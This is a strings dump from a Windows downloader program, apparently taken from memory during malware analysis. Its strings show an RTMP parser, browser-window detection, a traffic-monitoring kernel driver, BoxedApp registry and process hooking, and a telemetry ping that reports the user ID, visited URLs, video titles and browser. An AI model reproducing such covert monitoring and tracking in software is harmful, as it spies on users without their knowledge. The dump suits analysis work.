[CRtmpPacket::ParseFlvHeader] ___Warning - %d/%d header bytes
[CRtmpPacket::ParseFlvHeader] ___Error - No bytes to analyze
[CRtmpPacket::ParseFlvHeader] ___Error - Header already parsed
[CRtmpPacket::AppendData] Appended: %d (Total: %d/%d)
[CRtmpPacket::AppendData] ___Error - out of memory
[CRtmpPacket::AppendData] ___Warning - no bytes to append
[CRtmpPacket::Allocate] Allocated %d (Total: %d)
[CRtmpPacket::ParseHeader] ___Error - Channel: %d > 9
[CRtmpPacket::ParseHeader] Extended Time: %d
[CRtmpPacket::ParseHeader] Info Field: %d
[CRtmpPacket::ParseHeader] ___Warning - Packet Length: %d > 1M
[CRtmpPacket::ParseHeader] Packet Type: %d
[CRtmpPacket::ParseHeader] Packet Size: %d
[CRtmpPacket::ParseHeader] Time: %d
[CRtmpPacket::ParseHeader] Channel: %d
[CRtmpPacket::ParseHeader] Header Type: %d
[CRtmpPacket::ParseHeader] Header Size: %d
[CRtmpPacket::ParseHeader] Header Byte: 0x%.02X
[CRtmpPacket::ParseHeader] ___Warning - %d/%d header bytes
[CRtmpPacket::ParseHeader] ___Error - No bytes to analyze
[CRtmpPacket::ParseHeader] ___Error - Header already parsed
[CRtmpParser::Stop]
[CRtmpParser::ProcessData] ___Error - Unknown Packet Type: %d, Offset: %d
[CRtmpParser::ProcessData] Analyze Data: %d bytes
[CRtmpParser::ProcessData] ___Warning - Packet not ready for Data Processing
[CRtmpParser::OnHandshake] Step 4: Complete
[CRtmpParser::OnHandshake] Step 3: Complete
[CRtmpParser::OnHandshake] Step 2 - Server version: %d.%d.%d.%d
[CRtmpParser::OnHandshake] Step 2 - Server up time: %d
[CRtmpParser::OnHandshake] Step 1 - Client version: %d.%d.%d.%d
[CRtmpParser::OnHandshake] Step 1 - Client up time: %d
[CRtmpParser::OnHandshake] Protocol State: %d
[CRtmpParser::OnAudio]
[CRtmpParser::OnVideo]
[CRtmpParser::OnFLV]
[CRtmpParser::OnData]
[CRtmpParser::SetTimeStartPosition] Time: %d
[CRtmpParser::SetTimeEndPosition] Time: %d
[CRtmpParser::Close]
[CRtmpParser::OnError]
[CRtmpParser::SetAbsoluteTime] Client Absolute Time: %d (Max: %d)
[CRtmpParser::SetAbsoluteTime] Server Absolute Time: %d (Max: %d)
[CRtmpParser::Sync - %p]
[CRtmpParser::ParseFlvHeader]
[CRtmpParser::ParseData] Accumulated all %d/%d bytes
[CRtmpParser::ParseData] Chunk not ready
[CRtmpParser::ParseData] Going to append %d bytes
[CRtmpParser::ParseData] Got all %d/%d bytes
[CRtmpParser::ParseData] ___Warning - wait for all packet data to arraive (%d/%d)
[CRtmpParser::ParseData] ___Warning no data
[CRtmpParser::ParseData]
[CRtmpParser::ParseDataType] ___Error - Unknown Data Type: %d, Offset: %d
[CRtmpParser::ParseDataType] Date %f %d (Offset: %d)
[CRtmpParser::ParseDataType] Static Array %d (Offset: %d)
[CRtmpParser::ParseDataType] EOF Object (Offset: %d)
[CRtmpParser::ParseDataType] ECMA Array %d (Offset: %d)
[CRtmpParser::ParseDataType] Object (Offset: %d)
[CRtmpParser::OnChangeChunkSize] %d -> %d
[CRtmpParser::OnChangeChunkSize]
[CRtmpParser::OnReadBytes] Bytes read: %d
[CRtmpParser::OnReadBytes]
[CRtmpParser::OnMetadata]
[CRtmpParser::Reset - %p]
[CRtmpParser::ReadObject] ___Error %s - %d (Offset: %d) - Unknown Data Type
[CRtmpParser::ReadObject] EOF Object (Offset: %d)
[CRtmpParser::ReadObject] %s - Long String: %s (Offset: %d)
[CRtmpParser::ReadObject] %s - Date: %g (Offset: %d)
[CRtmpParser::ReadObject] %s - Static Array: %d (Offset: %d)
[CRtmpParser::ReadObject] %s - ECMA Array: %d (Offset: %d)
[CRtmpParser::ReadObject] %s - NULL (Offset: %d)
[CRtmpParser::ReadObject] %s - Object (Offset: %d)
[CRtmpParser::ReadObject] %s - String: %s (Offset: %d)
[CRtmpParser::ReadObject] %s - Boolean: %s (Offset: %d)
[CRtmpParser::ReadObject] %s - Numeric: %g (Offset: %d)
[CRtmpParser::ParseHandshakeHeader] Protocol - RTMPE
[CRtmpParser::ParseHandshakeHeader] Protocol - RTMP
[CRtmpParser::ParseHandshakeHeader]
[CRtmpParser::ParseHeader] Absolute Time: %d
[CRtmpParser::ParseHeader] New Time: %d
[CRtmpParser::ParseHeader] New Absolute Time: %d
[CRtmpParser::ParseHeader] _Prev Packet - Info Field: %d
[CRtmpParser::ParseHeader] _Prev Packet - Buffer Bytes: %d
[CRtmpParser::ParseHeader] _Prev Packet - Buffer Length: %d
[CRtmpParser::ParseHeader] _Prev Packet - Buffer: %p
[CRtmpParser::ParseHeader] _Prev Packet - Packet Type: %d
[CRtmpParser::ParseHeader] _Prev Packet - Packet Size: %d
[CRtmpParser::ParseHeader] _Prev Packet - Absolute Time: %d
[CRtmpParser::ParseHeader] _Prev Packet - Time: %d
[CRtmpParser::ParseHeader] _Prev Packet - Original Header Size: %d
[CRtmpParser::ParseHeader]
[CRtmpParser::UpdateBufferFromServer] Analyzed no bytes
[CRtmpParser::UpdateBufferFromServer] Analyzed %d/%d, Write: %d, Discard: %d
[CRtmpParser::UpdateBufferFromServer] Analyze Next Buffer... (Left: %d)
[CRtmpParser::UpdateBufferFromServer] Decrypt %d/%d bytes
[CRtmpParser::UpdateBufferFromServer] *** Data file Ended at Absolute Time: %d ***
[CRtmpParser::UpdateBufferFromServer] *** Data file Started at Absolute Time: %d ***
[CRtmpParser::UpdateBufferFromServer] Parser was stopped - discard the rest of the data!
[CRtmpParser::UpdateBufferFromServer] Decrypt %d bytes
[CRtmpParser::UpdateBufferFromServer] Parser was stopped - discard all data!
[CRtmpParser::UpdateBufferFromServer] Analyzing %d bytes...
[CRtmpParser::UpdateBufferFromClient] Analyzed %d/%d, Write: %d, Discard: %d
[CRtmpParser::UpdateBufferFromClient] Encrypt %d bytes
[CRtmpParser::UpdateBufferFromClient] Decrypt %d/%d bytes
[CRtmpParser::ParseBuffer] Analyze Next Packet... (Left: %d)
[CRtmpParser::UpdateBufferFromClient] Decrypt %d bytes
[CRtmpParser::UpdateBufferFromClient] ___Warning - Wait for the server handshake to complete...
[CRtmpParser::UpdateBufferFromClient] Analyzed no bytes
[CRtmpParser::UpdateBufferFromClient] Analyzing %d bytes...
[CRtmpParser::operator = %p] <= %p
[CRtmpParser::ParseFlvBuffer] Analyze Next FLV Buffer...
[CRtmpParser::AddDownloadFlowCommand] Method: %s -> Command: %s, Param: %d
[CRtmpParser::OnPing] SWFVerification
[CRtmpParser::OnPing] Time: %d
[CRtmpParser::OnPing] -- Unknown %d --
[CRtmpParser::OnPing] Stream buffer ready %d
[CRtmpParser::OnPing] Pause time: %d
[CRtmpParser::OnPing] Stream buffer empty %d
[CRtmpParser::OnPing] Pong %d
[CRtmpParser::OnPing] Stream is recorded %d
[CRtmpParser::OnPing] Ping %d
[CRtmpParser::OnPing] Stream dry %d
[CRtmpParser::OnPing] Stream EOF %d
[CRtmpParser::OnPing] Stream begin %d
[CRtmpParser::OnPing] Type: %d
[CRtmpParser::OnPing]
[CRtmpParser::OnServerBW] Server Bandwidth: %d
[CRtmpParser::OnServerBW]
[CRtmpParser::OnClientBW] Client Bandwidth: %d
[CRtmpParser::OnClientBW]
[CRtmpParser::OnInvoke] ___Error - Unknown Invokde method: %s
[CRtmpParser::OnInvoke] setBandwidthLimit( %g, %g )
[CRtmpParser::OnInvoke] getStats
[CRtmpParser::OnInvoke] secureTokenResponse: Token = %s
[CRtmpParser::OnInvoke] closeStream: StreamID = %g
[CRtmpParser::OnInvoke] deleteStream: StreamID = %g
[CRtmpParser::OnInvoke] releaseStream: PlayPath = %s
[CRtmpParser::OnInvoke] startStream: PlayPath = %s
[CRtmpParser::OnInvoke] createStream: StreamID = %g
[CRtmpParser::OnInvoke] %s( '%s', '%s', '%s' )
[CRtmpParser::OnInvoke] %s( '%s', '%s' )
[CRtmpParser::OnInvoke] seek( '%d' )
[CRtmpParser::OnInvoke] %s( '%d', '%g' )
[CRtmpParser::OnInvoke] %s( '%s' ), PacketInfo: %d
[CRtmpParser::OnInvoke] onStatus - code: %s, level: %s
[CRtmpParser::OnInvoke] _error - code: %s, level: %s
[CRtmpParser::OnInvoke] %s( '%s' )
[CRtmpParser::OnInvoke] _result createStream: StreamID = %g
[CRtmpParser::OnInvoke] _result connect - AMF3
[CRtmpParser::OnInvoke] _result connect: %s
[CRtmpParser::OnInvoke] _result for Method: %s
[CRtmpParser::OnInvoke] Method: %s
[CRtmpParser::OnInvoke]
Download Helper SendMsgToBtn, url: %s
Could not find converter registry key, %ws
Could not create process, error %x, proc %ws
RegContentType%d
RegRawData%d
RegProtocol%d
RegAgent%d
RegCookie%d
1.0.1.0
RegFileName%d
RegUrl
RegURL%d
%ws_%d.log
- Mozilla Firefox
- Windows Internet Explorer
opera
firefox
chrome
OPERA
opera.exe
safari.exe
firefox.exe
iexplore.exe
chrome.exe
explorer.exe
Google Chrome
Chrome_WidgetWin_1
Firefox
FirefoxBrowserWindow Found browser window, 0x%x
FirefoxBrowserWindow Found button window, 0x%x
IE9BrowserWindow Found browser window, 0x%x
IE9BrowserWindow Found button window, 0x%x
OperaBrowserWindow Found browser window, 0x%x
OperaBrowserWindow Found button window, 0x%x
Opera
SafariBrowserWindow Found browser window, 0x%x
SafariBrowserWindow Found button window, 0x%x
hXXp://VVV.youtube.com/watch?v=
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari/537.1
YTParser url not valid %ws
SBMonitor.log
Error no signature found at %s
GetVideoUrlAndSizeFromWatchPage Could not extract url_encoded_fmt_stream_map params.
GetVideoUrlAndSizeFromWatchPage
YTParser could not find valid url, not downloading
hXXp://VVV.youtube.com/get_video_info?video_id=
GetVideoUrlAndSizeFromVideoInfo
Failed processing urls from watch page.
reportLevel
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
(build %d)
Windows 2000
Windows XP
Web Edition
Windows Server 2003,
Windows XP Professional x64 Edition
Windows Home Server
Windows Storage Server 2003
Windows Server 2003 R2,
Web Server Edition
Windows Server 2008 R2
Windows 8
Windows 7
Windows Server 2008
Windows Vista
{X-hX-hX-XX-XXXXXX}
sbmntr.sys
Converter.exe
DownloadHelper.exe
HELPEREXELOCATION
YTDownloader.exe
MONITOREXELOCATION
hXXp://VVV.ytdownloader.com/feedback/
Driver - %ws: %x
\\.\SBMonitor
net.exe
Driver installed, NOT loaded: %s
Driver installed, loaded from %s
Software\Opera Software\
%programFiles%\Opera\opera.exe
Apple Application Support\WebKit2WebProcess.exe
Safari.exe
%programFiles%\Safari\Safari.exe
%programFiles%\Mozilla Firefox\firefox.exe
IEXPLORE.EXE
%programFiles%\Internet Explorer\iexplore.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%LOCALAPPDATA%\Google\Chrome\Application\chrome.exe
converter.exe
webm
[CMonitor::AddAppIdToDriver]___Error: Could not add App Ids (%x).
Same as one of buttons PID %d
Same as our PID %d
[CMonitor::EnableMonitoring]___Error: Could not enable monitoring device (%x).
___Error: Could not open device (%u).
-pid %d -size %s -sizeBytes %I64d -type %s -url %s -cookie %s -referer %s -host %s -useragent %s -resolution %s -protocol http
CMonitor::BuildParams Already created similar url, %ws
CMonitor::BuildParams Button exists for similar url, %ws
youtube.com
-pid %d -size %I64d -sizeBytes %I64d -type %s -url %s -cookie %s -referer %s -host %s -ads %s -useragent %s -protocol http
-pid %d -rawdata %s -protocol rtmp -duration %s -resolution %s
Fwpuclnt.dll
https
Not application/octet-stream video and the size is bigger than %d, %d
Not application/octet-stream video and the size is smaller than %d
Not FLV video and the size is smaller than %d
vid2.ak.dmcdn.net
CHttpMonitor::SameYoutubeVideo Same params page id = %s, itag = %s
CHttpMonitor::SameYoutubeVideo DASH same params page id = %s, itag = %s
CHttpMonitor::SameYoutubeVideo Same watch page %s
HTTP_Version_String
[HttpParser::ParseLine] ___Error: The field separator was not found in the line:
VVV.google.com
Global\{9DA0BEED-7248-450a-B27C-C0409BDC377D}
YTD-icon-128x128.png
Advapi32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
%saction=%s&userid=%s&usid=%s&aff=%s&v=%s&url=%s&title=%s&pingtext=%s&protocol=%s&size=%I64d&ref=%s&browser=%s
hXXp://rep.ytdownloader.com/app/ping.ashx?
%s%s%s
[RtmpDownloader::CreateProcessStdoutPipe] ___Error SetHandleInformation: %d
[RtmpDownloader::CreateProcessStdoutPipe] ___Error CreatePipe: %d
[RtmpDownloader::CreateProcessStdoutPipe] ___Error StdOut CloseHandle: %d
rtmpdump.exe
[RtmpDownloader::ReadFromPipe] --- Download Ends ---
[RtmpDownloader::ReadFromPipe] --- Download Begins ---
[RtmpDownloader::RunCommandLine] ___Error CreateProcess: %s. LE: %d
Error : failed to run FFmpeg - %d
[RtmpDownloader::RunCommandLine] ___Error CreateProcessStdoutPipe
Failed to run update (%x).
Trying to execute an update.
CUpdater::parseUpdateXML Set report level to %ws
REPORT
CMDLINE
%sid=%d_r=%lld_err=%d
%suserid=%s&aff=%s&v=%s
hXXp://VVV.ytdownloader.com/app/update.ashx?
mscoree.dll
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
ADVAPI32.DLL
WUSER32.DLL
<>"#%{}|\^~[]`' ?&
%Program Files%\YTDownloader\YTDownloader.exe
1.0.3.9

YTDownloader.exe_3496_rwx_10000000_000E6000:




.text
`.rdata
@.data
.rsrc
@.reloc
</.uCU
FtPh8
u$D
<p.uH
FTPSW
The embedding BoxedApp into child processes: %s
GetCommandLineA preparing to intercept...done
GetCommandLineW preparing to intercept...done
The command line overriding: %s
Get old args...done
Get current dir...done
Get the extension...done
Get exe dir...done
Get exe dir...
550e832f-a497-4eb7-bb40-8cc856f6d152
BoxedAppSDK::FileSystem::CFileSystem::DoFileOperation_FullPath
, passed pBehavior returns FILE_ATTRIBUTE_DIRECTORY attribute, but it's requested to create not a directory
, passed pBehavior doesn't support IVirtualFile
, passed pBehavior doesn't return FILE_ATTRIBUTE_DIRECTORY attribute, but it's requested to create a directory
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
[Isolation] DoFileOperation_FullPath: CreateFileDeletedInformationFile
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: IVirtualKeyHandle::CreateKey() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::Rename() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::SearchNodePointsToRealKey
: CRegistry::SetIsolationMode() failed for the hKey =
BoxedAppSDK::Registry::Impl::CRegistry::CreateNodePointsToRealKey
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKeyHelper
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKeyEx
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
reg:NtCreateKey(
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyProcessView
RegTree::IEnumKeyNode::GetNext(), hr =
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtOpenKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtEnumerateKey(
reg:NtDeleteKey(
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
kernel32.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
VirtualDllWithSameImport.dll
BoxedAppSDK_RemoveExeFromAttachableChildProcListW
BoxedAppSDK_RemoveExeFromAttachableChildProcListA
BoxedAppSDK_AddExeToAttachableChildProcListW
BoxedAppSDK_AddExeToAttachableChildProcListA
BoxedAppSDK_RemoveExeFromAttachableChildProcExclusionListA
BoxedAppSDK_RemoveExeFromAttachableChildProcExclusionListW
BoxedAppSDK_AddExeToAttachableChildProcExclusionListA
BoxedAppSDK_AddExeToAttachableChildProcExclusionListW
BoxedAppSDK_GetRegKeyIsolationModeA
BoxedAppSDK_GetRegKeyIsolationModeW
BoxedAppSDK_SetRegKeyIsolationModeA
BoxedAppSDK_SetRegKeyIsolationModeW
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_AddVirtualRegKeyW
BoxedAppSDK_AddVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}
BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
_CorExeMain
ole32.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
ntdll.dll
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
.idata
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegDeleteKeyW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyW
ADVAPI32.dll
OLEAUT32.dll
bxsdk32.dll
i:\build\boxedapp_src\src\boxedapp\bxsdk\bin\release_full\bxsdk32.pdb
`.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
System.Collections
System.Security.Permissions
1.0.0.0
$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
I:\build\boxedapp_src\src\BoxedApp\bxsdk\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
mscoree.dll
BoxedAppSDKThunk.dll
i:\build\boxedapp_src\src\boxedapp\bxsdk\obj\win32\release_full\boxedappsdkthunk\BoxedAppSDKThunk.pdb
.reloc
TLSSupport.dll
i:\build\boxedapp_src\src\boxedapp\bxsdk\obj\win32\release_full\tlssupport\TLSSupport.pdb
5"6.676@6|6
3O4L4T4]4
3(4,40444
11U1|1
>%>*>0>5>
2(4,40444
5f6D6e6
0=0"1.171@1`1
9%9u9~9
3 3-343;3
5o6L6T6]6
< ='=2=8=
;%;,;2;8;=;
: :4:8:<:@:
? ?$?(?,?0?4?8?<?
: :$:(:,:0:
GdiPlus.dll
HKEY_USERS
HKEY_CURRENT_CONFIG
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
%s\%s
:\tempManifest.manifest
%s\winsxs\tempBxDir\virtualAsm
BoxedAppVar:OldCmdLine
BoxedAppVar:ExeFullPath
BoxedAppVar:ExeFileNameWithoutExtension
BoxedAppVar:ExeFileExtension
BoxedAppVar:ExeFileName
BoxedAppLog_%d.txt
%s_%.8x
#SystemDrive#\#Windows#
#SystemDrive#\#Windows#\#System32#
\Device\NETBT_TCPIP_
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
.manifest
%s_%.8x_%.8x
.boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
>.config
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
image_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress and .Size both are 0, so this application is not a .net application; we are exiting now
nimage_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress and .Size both are not 0, so this application seems to be a .net application; we are executing mscoree.dll!_CorExeMain now
image_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].Size =
image_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] =
image_nt_headers.OptionalHeader.AddressOfEntryPoint is NULL, let's check if this application is .net
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
